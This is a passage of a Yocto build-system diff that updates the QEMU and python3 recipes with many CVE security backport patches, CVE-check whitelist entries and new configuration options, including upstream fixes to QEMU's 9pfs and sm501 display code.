336FILES_libpython3-staticdev += "${libdir}/python${PYTHON_MAJMIN}/config-${PYTHON_MAJMIN}-*/libpython${PYTHON_MAJMIN}.a" 339FILES_libpython3-staticdev += "${libdir}/python${PYTHON_MAJMIN}/config-${PYTHON_MAJMIN}-*/libpython${PYTHON_MAJMIN}.a"
337INSANE_SKIP_${PN}-dev += "dev-elf" 340INSANE_SKIP_${PN}-dev += "dev-elf"
341INSANE_SKIP_${PN}-ptest += "dev-deps"
338 342
339# catch all the rest (unsorted) 343# catch all the rest (unsorted)
340PACKAGES += "${PN}-misc" 344PACKAGES += "${PN}-misc"
@@ -350,7 +354,7 @@ FILES_${PN}-man = "${datadir}/man"
350# See https://bugs.python.org/issue18748 and https://bugs.python.org/issue37395 354# See https://bugs.python.org/issue18748 and https://bugs.python.org/issue37395
351RDEPENDS_libpython3_append_libc-glibc = " libgcc" 355RDEPENDS_libpython3_append_libc-glibc = " libgcc"
352RDEPENDS_${PN}-ctypes_append_libc-glibc = " ${MLPREFIX}ldconfig" 356RDEPENDS_${PN}-ctypes_append_libc-glibc = " ${MLPREFIX}ldconfig"
353RDEPENDS_${PN}-ptest = "${PN}-modules ${PN}-tests unzip bzip2 libgcc tzdata-europe coreutils sed" 357RDEPENDS_${PN}-ptest = "${PN}-modules ${PN}-tests ${PN}-dev unzip bzip2 libgcc tzdata-europe coreutils sed"
354RDEPENDS_${PN}-ptest_append_libc-glibc = " locale-base-tr-tr.iso-8859-9" 358RDEPENDS_${PN}-ptest_append_libc-glibc = " locale-base-tr-tr.iso-8859-9"
355RDEPENDS_${PN}-tkinter += "${@bb.utils.contains('PACKAGECONFIG', 'tk', 'tk tk-lib', '', d)}" 359RDEPENDS_${PN}-tkinter += "${@bb.utils.contains('PACKAGECONFIG', 'tk', 'tk tk-lib', '', d)}"
356RDEPENDS_${PN}-dev = "" 360RDEPENDS_${PN}-dev = ""
diff --git a/meta/recipes-devtools/qemu/qemu-system-native_4.2.0.bb b/meta/recipes-devtools/qemu/qemu-system-native_4.2.0.bb
index d83ee59375..5ae6a37f26 100644
--- a/meta/recipes-devtools/qemu/qemu-system-native_4.2.0.bb
+++ b/meta/recipes-devtools/qemu/qemu-system-native_4.2.0.bb
@@ -9,7 +9,7 @@ DEPENDS = "glib-2.0-native zlib-native pixman-native qemu-native bison-native"
9 9
10EXTRA_OECONF_append = " --target-list=${@get_qemu_system_target_list(d)}" 10EXTRA_OECONF_append = " --target-list=${@get_qemu_system_target_list(d)}"
11 11
12PACKAGECONFIG ??= "fdt alsa kvm" 12PACKAGECONFIG ??= "fdt alsa kvm slirp"
13 13
14# Handle distros such as CentOS 5 32-bit that do not have kvm support 14# Handle distros such as CentOS 5 32-bit that do not have kvm support
15PACKAGECONFIG_remove = "${@'kvm' if not os.path.exists('/usr/include/linux/kvm.h') else ''}" 15PACKAGECONFIG_remove = "${@'kvm' if not os.path.exists('/usr/include/linux/kvm.h') else ''}"
diff --git a/meta/recipes-devtools/qemu/qemu.inc b/meta/recipes-devtools/qemu/qemu.inc
index a1a418374f..59ff69d51d 100644
--- a/meta/recipes-devtools/qemu/qemu.inc
+++ b/meta/recipes-devtools/qemu/qemu.inc
@@ -35,30 +35,147 @@ SRC_URI = "https://download.qemu.org/${BPN}-${PV}.tar.xz \
35 file://CVE-2020-7039-2.patch \ 35 file://CVE-2020-7039-2.patch \
36 file://CVE-2020-7039-3.patch \ 36 file://CVE-2020-7039-3.patch \
37 file://0001-Add-enable-disable-udev.patch \ 37 file://0001-Add-enable-disable-udev.patch \
38 file://CVE-2020-7211.patch \ 38 file://CVE-2020-7211.patch \
39 file://0001-qemu-Do-not-include-file-if-not-exists.patch \ 39 file://0001-qemu-Do-not-include-file-if-not-exists.patch \
40 file://CVE-2020-11102.patch \ 40 file://CVE-2020-11102.patch \
41 file://CVE-2020-11869.patch \ 41 file://CVE-2020-11869.patch \
42 file://CVE-2020-13361.patch \ 42 file://CVE-2020-13361.patch \
43 file://CVE-2020-10761.patch \ 43 file://CVE-2020-10761.patch \
44 file://CVE-2020-10702.patch \ 44 file://CVE-2020-10702.patch \
45 file://CVE-2020-13659.patch \ 45 file://CVE-2020-13659.patch \
46 file://CVE-2020-13800.patch \ 46 file://CVE-2020-13800.patch \
47 file://CVE-2020-13362.patch \ 47 file://CVE-2020-13362.patch \
48 file://CVE-2020-15863.patch \ 48 file://CVE-2020-15863.patch \
49 file://CVE-2020-14364.patch \ 49 file://CVE-2020-14364.patch \
50 file://CVE-2020-14415.patch \ 50 file://CVE-2020-14415.patch \
51 file://CVE-2020-16092.patch \ 51 file://CVE-2020-16092.patch \
52 file://0001-target-mips-Increase-number-of-TLB-entries-on-the-34.patch \ 52 file://0001-target-mips-Increase-number-of-TLB-entries-on-the-34.patch \
53 file://CVE-2019-20175.patch \ 53 file://CVE-2019-20175.patch \
54 file://CVE-2020-24352.patch \ 54 file://CVE-2020-24352.patch \
55 file://CVE-2020-25723.patch \ 55 file://CVE-2020-25723.patch \
56 " 56 file://CVE-2021-20203.patch \
57 file://CVE-2021-3392.patch \
58 file://CVE-2020-25085.patch \
59 file://CVE-2020-25624_1.patch \
60 file://CVE-2020-25624_2.patch \
61 file://CVE-2020-25625.patch \
62 file://CVE-2020-29443.patch \
63 file://CVE-2021-20221.patch \
64 file://CVE-2021-20181.patch \
65 file://CVE-2021-3416_1.patch \
66 file://CVE-2021-3416_2.patch \
67 file://CVE-2021-3416_3.patch \
68 file://CVE-2021-3416_5.patch \
69 file://CVE-2021-3416_6.patch \
70 file://CVE-2021-3416_7.patch \
71 file://CVE-2021-3416_8.patch \
72 file://CVE-2021-3416_9.patch \
73 file://CVE-2021-3416_10.patch \
74 file://CVE-2021-20257.patch \
75 file://CVE-2021-3544.patch \
76 file://CVE-2021-3544_2.patch \
77 file://CVE-2021-3544_3.patch \
78 file://CVE-2021-3544_4.patch \
79 file://CVE-2021-3544_5.patch \
80 file://CVE-2021-3545.patch \
81 file://CVE-2021-3546.patch \
82 file://CVE-2021-3527-1.patch \
83 file://CVE-2021-3527-2.patch \
84 file://CVE-2021-3582.patch \
85 file://CVE-2021-3607.patch \
86 file://CVE-2021-3608.patch \
87 file://CVE-2020-12829_1.patch \
88 file://CVE-2020-12829_2.patch \
89 file://CVE-2020-12829_3.patch \
90 file://CVE-2020-12829_4.patch \
91 file://CVE-2020-12829_5.patch \
92 file://CVE-2020-27617.patch \
93 file://CVE-2020-28916.patch \
94 file://CVE-2021-3682.patch \
95 file://CVE-2020-13253_1.patch \
96 file://CVE-2020-13253_2.patch \
97 file://CVE-2020-13253_3.patch \
98 file://CVE-2020-13253_4.patch \
99 file://CVE-2020-13253_5.patch \
100 file://CVE-2020-13791.patch \
101 file://CVE-2022-35414.patch \
102 file://CVE-2020-27821.patch \
103 file://CVE-2020-13754-1.patch \
104 file://CVE-2020-13754-2.patch \
105 file://CVE-2020-13754-3.patch \
106 file://CVE-2020-13754-4.patch \
107 file://CVE-2021-3713.patch \
108 file://CVE-2021-3748.patch \
109 file://CVE-2021-3930.patch \
110 file://CVE-2021-4206.patch \
111 file://CVE-2021-4207.patch \
112 file://CVE-2022-0216-1.patch \
113 file://CVE-2022-0216-2.patch \
114 file://CVE-2021-3750.patch \
115 file://CVE-2021-3638.patch \
116 file://CVE-2021-20196.patch \
117 file://CVE-2021-3507.patch \
118 file://hw-block-nvme-refactor-nvme_addr_read.patch \
119 file://hw-block-nvme-handle-dma-errors.patch \
120 file://CVE-2021-3929.patch \
121 file://CVE-2022-4144.patch \
122 file://CVE-2020-15859.patch \
123 file://CVE-2020-15469-1.patch \
124 file://CVE-2020-15469-2.patch \
125 file://CVE-2020-15469-3.patch \
126 file://CVE-2020-15469-4.patch \
127 file://CVE-2020-15469-5.patch \
128 file://CVE-2020-15469-6.patch \
129 file://CVE-2020-15469-7.patch \
130 file://CVE-2020-15469-8.patch \
131 file://CVE-2020-35504.patch \
132 file://CVE-2020-35505.patch \
133 file://CVE-2022-26354.patch \
134 file://CVE-2021-3409-1.patch \
135 file://CVE-2021-3409-2.patch \
136 file://CVE-2021-3409-3.patch \
137 file://CVE-2021-3409-4.patch \
138 file://CVE-2021-3409-5.patch \
139 file://hw-display-qxl-Pass-requested-buffer-size-to-qxl_phy.patch \
140 file://CVE-2023-0330.patch \
141 file://CVE-2023-3354.patch \
142 file://CVE-2023-3180.patch \
143 file://CVE-2020-24165.patch \
144 file://CVE-2023-5088.patch \
145 file://9pfs-local-ignore-O_NOATIME-if-we-don-t-have-permiss.patch \
146 file://CVE-2023-2861.patch \
147 "
57UPSTREAM_CHECK_REGEX = "qemu-(?P<pver>\d+(\.\d+)+)\.tar" 148UPSTREAM_CHECK_REGEX = "qemu-(?P<pver>\d+(\.\d+)+)\.tar"
58 149
59SRC_URI[md5sum] = "278eeb294e4b497e79af7a57e660cb9a" 150SRC_URI[md5sum] = "278eeb294e4b497e79af7a57e660cb9a"
60SRC_URI[sha256sum] = "d3481d4108ce211a053ef15be69af1bdd9dde1510fda80d92be0f6c3e98768f0" 151SRC_URI[sha256sum] = "d3481d4108ce211a053ef15be69af1bdd9dde1510fda80d92be0f6c3e98768f0"
61 152
153# Applies against virglrender < 0.6.0 and not qemu itself
154CVE_CHECK_WHITELIST += "CVE-2017-5957"
155
156# The VNC server can expose host files uder some circumstances. We don't
157# enable it by default.
158CVE_CHECK_WHITELIST += "CVE-2007-0998"
159
160# 'The issues identified by this CVE were determined to not constitute a vulnerability.'
161# https://bugzilla.redhat.com/show_bug.cgi?id=1609015#c11
162CVE_CHECK_WHITELIST += "CVE-2018-18438"
163
164# the issue introduced in v5.1.0-rc0
165CVE_CHECK_WHITELIST += "CVE-2020-27661"
166
167# As per https://nvd.nist.gov/vuln/detail/CVE-2023-0664
168# https://bugzilla.redhat.com/show_bug.cgi?id=2167423
169# this bug related to windows specific.
170CVE_CHECK_WHITELIST += "CVE-2023-0664"
171
172# As per https://bugzilla.redhat.com/show_bug.cgi?id=2203387
173# RHEL specific issue
174CVE_CHECK_WHITELIST += "CVE-2023-2680"
175
176# Affected only `qemu-kvm` shipped with Red Hat Enterprise Linux 8.3 release.
177CVE_CHECK_WHITELIST += "CVE-2021-20295"
178
62COMPATIBLE_HOST_mipsarchn32 = "null" 179COMPATIBLE_HOST_mipsarchn32 = "null"
63COMPATIBLE_HOST_mipsarchn64 = "null" 180COMPATIBLE_HOST_mipsarchn64 = "null"
64 181
@@ -197,6 +314,16 @@ PACKAGECONFIG[glusterfs] = "--enable-glusterfs,--disable-glusterfs"
197PACKAGECONFIG[xkbcommon] = "--enable-xkbcommon,--disable-xkbcommon,libxkbcommon" 314PACKAGECONFIG[xkbcommon] = "--enable-xkbcommon,--disable-xkbcommon,libxkbcommon"
198PACKAGECONFIG[libudev] = "--enable-libudev,--disable-libudev,eudev" 315PACKAGECONFIG[libudev] = "--enable-libudev,--disable-libudev,eudev"
199PACKAGECONFIG[libxml2] = "--enable-libxml2,--disable-libxml2,libxml2" 316PACKAGECONFIG[libxml2] = "--enable-libxml2,--disable-libxml2,libxml2"
317PACKAGECONFIG[seccomp] = "--enable-seccomp,--disable-seccomp,libseccomp"
318PACKAGECONFIG[capstone] = "--enable-capstone,--disable-capstone"
319# libnfs is currently provided by meta-kodi
320PACKAGECONFIG[libnfs] = "--enable-libnfs,--disable-libnfs,libnfs"
321PACKAGECONFIG[brlapi] = "--enable-brlapi,--disable-brlapi"
322PACKAGECONFIG[vde] = "--enable-vde,--disable-vde"
323# version 4.2.0 doesn't have an "internal" option for enable-slirp, so use "git" which uses the same configure code path
324PACKAGECONFIG[slirp] = "--enable-slirp=git,--disable-slirp"
325PACKAGECONFIG[rbd] = "--enable-rbd,--disable-rbd"
326PACKAGECONFIG[rdma] = "--enable-rdma,--disable-rdma"
200 327
201INSANE_SKIP_${PN} = "arch" 328INSANE_SKIP_${PN} = "arch"
202 329
diff --git a/meta/recipes-devtools/qemu/qemu/0012-fix-libcap-header-issue-on-some-distro.patch b/meta/recipes-devtools/qemu/qemu/0012-fix-libcap-header-issue-on-some-distro.patch
index 3a7d7bbd33..3789f1edea 100644
--- a/meta/recipes-devtools/qemu/qemu/0012-fix-libcap-header-issue-on-some-distro.patch
+++ b/meta/recipes-devtools/qemu/qemu/0012-fix-libcap-header-issue-on-some-distro.patch
@@ -60,7 +60,7 @@ Signed-off-by: Hongxu Jia <hongxu.jia@windriver.com>
60 1 file changed, 5 insertions(+), 2 deletions(-) 60 1 file changed, 5 insertions(+), 2 deletions(-)
61 61
62diff --git a/fsdev/virtfs-proxy-helper.c b/fsdev/virtfs-proxy-helper.c 62diff --git a/fsdev/virtfs-proxy-helper.c b/fsdev/virtfs-proxy-helper.c
63index 6f132c5f..8329950c 100644 63index 300c9765..2823db7d 100644
64--- a/fsdev/virtfs-proxy-helper.c 64--- a/fsdev/virtfs-proxy-helper.c
65+++ b/fsdev/virtfs-proxy-helper.c 65+++ b/fsdev/virtfs-proxy-helper.c
66@@ -13,7 +13,6 @@ 66@@ -13,7 +13,6 @@
@@ -71,9 +71,9 @@ index 6f132c5f..8329950c 100644
71 #include <sys/fsuid.h> 71 #include <sys/fsuid.h>
72 #include <sys/vfs.h> 72 #include <sys/vfs.h>
73 #include <sys/ioctl.h> 73 #include <sys/ioctl.h>
74@@ -27,7 +26,11 @@ 74@@ -28,7 +27,11 @@
75 #include "9p-iov-marshal.h"
76 #include "hw/9pfs/9p-proxy.h" 75 #include "hw/9pfs/9p-proxy.h"
76 #include "hw/9pfs/9p-util.h"
77 #include "fsdev/9p-iov-marshal.h" 77 #include "fsdev/9p-iov-marshal.h"
78- 78-
79+/* 79+/*
@@ -84,3 +84,6 @@ index 6f132c5f..8329950c 100644
84 #define PROGNAME "virtfs-proxy-helper" 84 #define PROGNAME "virtfs-proxy-helper"
85 85
86 #ifndef XFS_SUPER_MAGIC 86 #ifndef XFS_SUPER_MAGIC
87--
882.25.1
89
diff --git a/meta/recipes-devtools/qemu/qemu/9pfs-local-ignore-O_NOATIME-if-we-don-t-have-permiss.patch b/meta/recipes-devtools/qemu/qemu/9pfs-local-ignore-O_NOATIME-if-we-don-t-have-permiss.patch
new file mode 100644
index 0000000000..72d9c47bde
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/9pfs-local-ignore-O_NOATIME-if-we-don-t-have-permiss.patch
@@ -0,0 +1,63 @@
1From a5804fcf7b22fc7d1f9ec794dd284c7d504bd16b Mon Sep 17 00:00:00 2001
2From: Omar Sandoval <osandov@fb.com>
3Date: Thu, 14 May 2020 08:06:43 +0200
4Subject: [PATCH] 9pfs: local: ignore O_NOATIME if we don't have permissions
5
6QEMU's local 9pfs server passes through O_NOATIME from the client. If
7the QEMU process doesn't have permissions to use O_NOATIME (namely, it
8does not own the file nor have the CAP_FOWNER capability), the open will
9fail. This causes issues when from the client's point of view, it
10believes it has permissions to use O_NOATIME (e.g., a process running as
11root in the virtual machine). Additionally, overlayfs on Linux opens
12files on the lower layer using O_NOATIME, so in this case a 9pfs mount
13can't be used as a lower layer for overlayfs (cf.
14https://github.com/osandov/drgn/blob/dabfe1971951701da13863dbe6d8a1d172ad9650/vmtest/onoatimehack.c
15and https://github.com/NixOS/nixpkgs/issues/54509).
16
17Luckily, O_NOATIME is effectively a hint, and is often ignored by, e.g.,
18network filesystems. open(2) notes that O_NOATIME "may not be effective
19on all filesystems. One example is NFS, where the server maintains the
20access time." This means that we can honor it when possible but fall
21back to ignoring it.
22
23Acked-by: Christian Schoenebeck <qemu_oss@crudebyte.com>
24Signed-off-by: Omar Sandoval <osandov@fb.com>
25Message-Id: <e9bee604e8df528584693a4ec474ded6295ce8ad.1587149256.git.osandov@fb.com>
26Signed-off-by: Greg Kurz <groug@kaod.org>
27
28Upstream-Status: Backport [https://gitlab.com/qemu-project/qemu/-/commit/a5804fcf7b22fc7d1f9ec794dd284c7d504bd16b]
29Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
30---
31 hw/9pfs/9p-util.h | 13 +++++++++++++
32 1 file changed, 13 insertions(+)
33
34diff --git a/hw/9pfs/9p-util.h b/hw/9pfs/9p-util.h
35index 79ed6b233e5..546f46dc7dc 100644
36--- a/hw/9pfs/9p-util.h
37+++ b/hw/9pfs/9p-util.h
38@@ -37,9 +37,22 @@ static inline int openat_file(int dirfd, const char *name, int flags,
39 {
40 int fd, serrno, ret;
41
42+again:
43 fd = openat(dirfd, name, flags | O_NOFOLLOW | O_NOCTTY | O_NONBLOCK,
44 mode);
45 if (fd == -1) {
46+ if (errno == EPERM && (flags & O_NOATIME)) {
47+ /*
48+ * The client passed O_NOATIME but we lack permissions to honor it.
49+ * Rather than failing the open, fall back without O_NOATIME. This
50+ * doesn't break the semantics on the client side, as the Linux
51+ * open(2) man page notes that O_NOATIME "may not be effective on
52+ * all filesystems". In particular, NFS and other network
53+ * filesystems ignore it entirely.
54+ */
55+ flags &= ~O_NOATIME;
56+ goto again;
57+ }
58 return -1;
59 }
60
61--
62GitLab
63
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_1.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_1.patch
new file mode 100644
index 0000000000..6fee4f640d
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_1.patch
@@ -0,0 +1,164 @@
1From e29da77e5fddf6480e3a0e80b63d703edaec751b Mon Sep 17 00:00:00 2001
2From: BALATON Zoltan <balaton@eik.bme.hu>
3Date: Thu, 21 May 2020 21:39:44 +0200
4Subject: [PATCH] sm501: Convert printf + abort to qemu_log_mask
5MIME-Version: 1.0
6Content-Type: text/plain; charset=UTF-8
7Content-Transfer-Encoding: 8bit
8
9Some places already use qemu_log_mask() to log unimplemented features
10or errors but some others have printf() then abort(). Convert these to
11qemu_log_mask() and avoid aborting to prevent guests to easily cause
12denial of service.
13
14Signed-off-by: BALATON Zoltan <balaton@eik.bme.hu>
15Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
16Message-id: 305af87f59d81e92f2aaff09eb8a3603b8baa322.1590089984.git.balaton@eik.bme.hu
17Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
18
19Upstream-Status: Backport
20CVE: CVE-2020-12829 dep#1
21Signed-off-by: Armin Kuster <akuster@mvista.com>
22
23---
24 hw/display/sm501.c | 57 ++++++++++++++++++++++------------------------
25 1 file changed, 27 insertions(+), 30 deletions(-)
26
27diff --git a/hw/display/sm501.c b/hw/display/sm501.c
28index acc692531a..bd3ccfe311 100644
29--- a/hw/display/sm501.c
30+++ b/hw/display/sm501.c
31@@ -727,8 +727,8 @@ static void sm501_2d_operation(SM501State *s)
32 int fb_len = get_width(s, crt) * get_height(s, crt) * get_bpp(s, crt);
33
34 if (addressing != 0x0) {
35- printf("%s: only XY addressing is supported.\n", __func__);
36- abort();
37+ qemu_log_mask(LOG_UNIMP, "sm501: only XY addressing is supported.\n");
38+ return;
39 }
40
41 if (rop_mode == 0) {
42@@ -754,8 +754,8 @@ static void sm501_2d_operation(SM501State *s)
43
44 if ((s->twoD_source_base & 0x08000000) ||
45 (s->twoD_destination_base & 0x08000000)) {
46- printf("%s: only local memory is supported.\n", __func__);
47- abort();
48+ qemu_log_mask(LOG_UNIMP, "sm501: only local memory is supported.\n");
49+ return;
50 }
51
52 switch (operation) {
53@@ -823,9 +823,9 @@ static void sm501_2d_operation(SM501State *s)
54 break;
55
56 default:
57- printf("non-implemented SM501 2D operation. %d\n", operation);
58- abort();
59- break;
60+ qemu_log_mask(LOG_UNIMP, "sm501: not implemented 2D operation: %d\n",
61+ operation);
62+ return;
63 }
64
65 if (dst_base >= get_fb_addr(s, crt) &&
66@@ -892,9 +892,8 @@ static uint64_t sm501_system_config_read(void *opaque, hwaddr addr,
67 break;
68
69 default:
70- printf("sm501 system config : not implemented register read."
71- " addr=%x\n", (int)addr);
72- abort();
73+ qemu_log_mask(LOG_UNIMP, "sm501: not implemented system config"
74+ "register read. addr=%" HWADDR_PRIx "\n", addr);
75 }
76
77 return ret;
78@@ -948,15 +947,15 @@ static void sm501_system_config_write(void *opaque, hwaddr addr,
79 break;
80 case SM501_ENDIAN_CONTROL:
81 if (value & 0x00000001) {
82- printf("sm501 system config : big endian mode not implemented.\n");
83- abort();
84+ qemu_log_mask(LOG_UNIMP, "sm501: system config big endian mode not"
85+ " implemented.\n");
86 }
87 break;
88
89 default:
90- printf("sm501 system config : not implemented register write."
91- " addr=%x, val=%x\n", (int)addr, (uint32_t)value);
92- abort();
93+ qemu_log_mask(LOG_UNIMP, "sm501: not implemented system config"
94+ "register write. addr=%" HWADDR_PRIx
95+ ", val=%" PRIx64 "\n", addr, value);
96 }
97 }
98
99@@ -1207,9 +1206,8 @@ static uint64_t sm501_disp_ctrl_read(void *opaque, hwaddr addr,
100 break;
101
102 default:
103- printf("sm501 disp ctrl : not implemented register read."
104- " addr=%x\n", (int)addr);
105- abort();
106+ qemu_log_mask(LOG_UNIMP, "sm501: not implemented disp ctrl register "
107+ "read. addr=%" HWADDR_PRIx "\n", addr);
108 }
109
110 return ret;
111@@ -1345,9 +1343,9 @@ static void sm501_disp_ctrl_write(void *opaque, hwaddr addr,
112 break;
113
114 default:
115- printf("sm501 disp ctrl : not implemented register write."
116- " addr=%x, val=%x\n", (int)addr, (unsigned)value);
117- abort();
118+ qemu_log_mask(LOG_UNIMP, "sm501: not implemented disp ctrl register "
119+ "write. addr=%" HWADDR_PRIx
120+ ", val=%" PRIx64 "\n", addr, value);
121 }
122 }
123
124@@ -1433,9 +1431,8 @@ static uint64_t sm501_2d_engine_read(void *opaque, hwaddr addr,
125 ret = 0; /* Should return interrupt status */
126 break;
127 default:
128- printf("sm501 disp ctrl : not implemented register read."
129- " addr=%x\n", (int)addr);
130- abort();
131+ qemu_log_mask(LOG_UNIMP, "sm501: not implemented disp ctrl register "
132+ "read. addr=%" HWADDR_PRIx "\n", addr);
133 }
134
135 return ret;
136@@ -1520,9 +1517,9 @@ static void sm501_2d_engine_write(void *opaque, hwaddr addr,
137 /* ignored, writing 0 should clear interrupt status */
138 break;
139 default:
140- printf("sm501 2d engine : not implemented register write."
141- " addr=%x, val=%x\n", (int)addr, (unsigned)value);
142- abort();
143+ qemu_log_mask(LOG_UNIMP, "sm501: not implemented 2d engine register "
144+ "write. addr=%" HWADDR_PRIx
145+ ", val=%" PRIx64 "\n", addr, value);
146 }
147 }
148
149@@ -1670,9 +1667,9 @@ static void sm501_update_display(void *opaque)
150 draw_line = draw_line32_funcs[dst_depth_index];
151 break;
152 default:
153- printf("sm501 update display : invalid control register value.\n");
154- abort();
155- break;
156+ qemu_log_mask(LOG_GUEST_ERROR, "sm501: update display"
157+ "invalid control register value.\n");
158+ return;
159 }
160
161 /* set up to draw hardware cursor */
162--
1632.25.1
164
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_2.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_2.patch
new file mode 100644
index 0000000000..e7258a43d3
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_2.patch
@@ -0,0 +1,139 @@
1From 6f8183b5dc5b309378687830a25e85ea8fb860ea Mon Sep 17 00:00:00 2001
2From: BALATON Zoltan <balaton@eik.bme.hu>
3Date: Thu, 21 May 2020 21:39:44 +0200
4Subject: [PATCH 2/5] sm501: Shorten long variable names in sm501_2d_operation
5
6This increases readability and cleans up some confusing naming.
7
8Signed-off-by: BALATON Zoltan <balaton@eik.bme.hu>
9Message-id: b9b67b94c46e945252a73c77dfd117132c63c4fb.1590089984.git.balaton@eik.bme.hu
10Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
11
12Upstream-Status: Backport
13CVE: CVE-2020-12829 dep#2
14Signed-off-by: Armin Kuster <akuster@mvista.com>
15
16---
17 hw/display/sm501.c | 45 ++++++++++++++++++++++-----------------------
18 1 file changed, 22 insertions(+), 23 deletions(-)
19
20diff --git a/hw/display/sm501.c b/hw/display/sm501.c
21index bd3ccfe311..f42d05e1e4 100644
22--- a/hw/display/sm501.c
23+++ b/hw/display/sm501.c
24@@ -700,17 +700,16 @@ static inline void hwc_invalidate(SM501State *s, int crt)
25 static void sm501_2d_operation(SM501State *s)
26 {
27 /* obtain operation parameters */
28- int operation = (s->twoD_control >> 16) & 0x1f;
29+ int cmd = (s->twoD_control >> 16) & 0x1F;
30 int rtl = s->twoD_control & 0x8000000;
31 int src_x = (s->twoD_source >> 16) & 0x01FFF;
32 int src_y = s->twoD_source & 0xFFFF;
33 int dst_x = (s->twoD_destination >> 16) & 0x01FFF;
34 int dst_y = s->twoD_destination & 0xFFFF;
35- int operation_width = (s->twoD_dimension >> 16) & 0x1FFF;
36- int operation_height = s->twoD_dimension & 0xFFFF;
37+ int width = (s->twoD_dimension >> 16) & 0x1FFF;
38+ int height = s->twoD_dimension & 0xFFFF;
39 uint32_t color = s->twoD_foreground;
40- int format_flags = (s->twoD_stretch >> 20) & 0x3;
41- int addressing = (s->twoD_stretch >> 16) & 0xF;
42+ int format = (s->twoD_stretch >> 20) & 0x3;
43 int rop_mode = (s->twoD_control >> 15) & 0x1; /* 1 for rop2, else rop3 */
44 /* 1 if rop2 source is the pattern, otherwise the source is the bitmap */
45 int rop2_source_is_pattern = (s->twoD_control >> 14) & 0x1;
46@@ -721,12 +720,12 @@ static void sm501_2d_operation(SM501State *s)
47 /* get frame buffer info */
48 uint8_t *src = s->local_mem + src_base;
49 uint8_t *dst = s->local_mem + dst_base;
50- int src_width = s->twoD_pitch & 0x1FFF;
51- int dst_width = (s->twoD_pitch >> 16) & 0x1FFF;
52+ int src_pitch = s->twoD_pitch & 0x1FFF;
53+ int dst_pitch = (s->twoD_pitch >> 16) & 0x1FFF;
54 int crt = (s->dc_crt_control & SM501_DC_CRT_CONTROL_SEL) ? 1 : 0;
55 int fb_len = get_width(s, crt) * get_height(s, crt) * get_bpp(s, crt);
56
57- if (addressing != 0x0) {
58+ if ((s->twoD_stretch >> 16) & 0xF) {
59 qemu_log_mask(LOG_UNIMP, "sm501: only XY addressing is supported.\n");
60 return;
61 }
62@@ -758,20 +757,20 @@ static void sm501_2d_operation(SM501State *s)
63 return;
64 }
65
66- switch (operation) {
67+ switch (cmd) {
68 case 0x00: /* copy area */
69 #define COPY_AREA(_bpp, _pixel_type, rtl) { \
70 int y, x, index_d, index_s; \
71- for (y = 0; y < operation_height; y++) { \
72- for (x = 0; x < operation_width; x++) { \
73+ for (y = 0; y < height; y++) { \
74+ for (x = 0; x < width; x++) { \
75 _pixel_type val; \
76 \
77 if (rtl) { \
78- index_s = ((src_y - y) * src_width + src_x - x) * _bpp; \
79- index_d = ((dst_y - y) * dst_width + dst_x - x) * _bpp; \
80+ index_s = ((src_y - y) * src_pitch + src_x - x) * _bpp; \
81+ index_d = ((dst_y - y) * dst_pitch + dst_x - x) * _bpp; \
82 } else { \
83- index_s = ((src_y + y) * src_width + src_x + x) * _bpp; \
84- index_d = ((dst_y + y) * dst_width + dst_x + x) * _bpp; \
85+ index_s = ((src_y + y) * src_pitch + src_x + x) * _bpp; \
86+ index_d = ((dst_y + y) * dst_pitch + dst_x + x) * _bpp; \
87 } \
88 if (rop_mode == 1 && rop == 5) { \
89 /* Invert dest */ \
90@@ -783,7 +782,7 @@ static void sm501_2d_operation(SM501State *s)
91 } \
92 } \
93 }
94- switch (format_flags) {
95+ switch (format) {
96 case 0:
97 COPY_AREA(1, uint8_t, rtl);
98 break;
99@@ -799,15 +798,15 @@ static void sm501_2d_operation(SM501State *s)
100 case 0x01: /* fill rectangle */
101 #define FILL_RECT(_bpp, _pixel_type) { \
102 int y, x; \
103- for (y = 0; y < operation_height; y++) { \
104- for (x = 0; x < operation_width; x++) { \
105- int index = ((dst_y + y) * dst_width + dst_x + x) * _bpp; \
106+ for (y = 0; y < height; y++) { \
107+ for (x = 0; x < width; x++) { \
108+ int index = ((dst_y + y) * dst_pitch + dst_x + x) * _bpp; \
109 *(_pixel_type *)&dst[index] = (_pixel_type)color; \
110 } \
111 } \
112 }
113
114- switch (format_flags) {
115+ switch (format) {
116 case 0:
117 FILL_RECT(1, uint8_t);
118 break;
119@@ -824,14 +823,14 @@ static void sm501_2d_operation(SM501State *s)
120
121 default:
122 qemu_log_mask(LOG_UNIMP, "sm501: not implemented 2D operation: %d\n",
123- operation);
124+ cmd);
125 return;
126 }
127
128 if (dst_base >= get_fb_addr(s, crt) &&
129 dst_base <= get_fb_addr(s, crt) + fb_len) {
130- int dst_len = MIN(fb_len, ((dst_y + operation_height - 1) * dst_width +
131- dst_x + operation_width) * (1 << format_flags));
132+ int dst_len = MIN(fb_len, ((dst_y + height - 1) * dst_pitch +
133+ dst_x + width) * (1 << format));
134 if (dst_len) {
135 memory_region_set_dirty(&s->local_mem_region, dst_base, dst_len);
136 }
137--
1382.25.1
139
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_3.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_3.patch
new file mode 100644
index 0000000000..c647028cfe
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_3.patch
@@ -0,0 +1,47 @@
1From 2824809b7f8f03ddc6e2b7e33e78c06022424298 Mon Sep 17 00:00:00 2001
2From: BALATON Zoltan <balaton@eik.bme.hu>
3Date: Thu, 21 May 2020 21:39:44 +0200
4Subject: [PATCH 3/5] sm501: Use BIT(x) macro to shorten constant
5MIME-Version: 1.0
6Content-Type: text/plain; charset=UTF-8
7Content-Transfer-Encoding: 8bit
8
9Signed-off-by: BALATON Zoltan <balaton@eik.bme.hu>
10Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
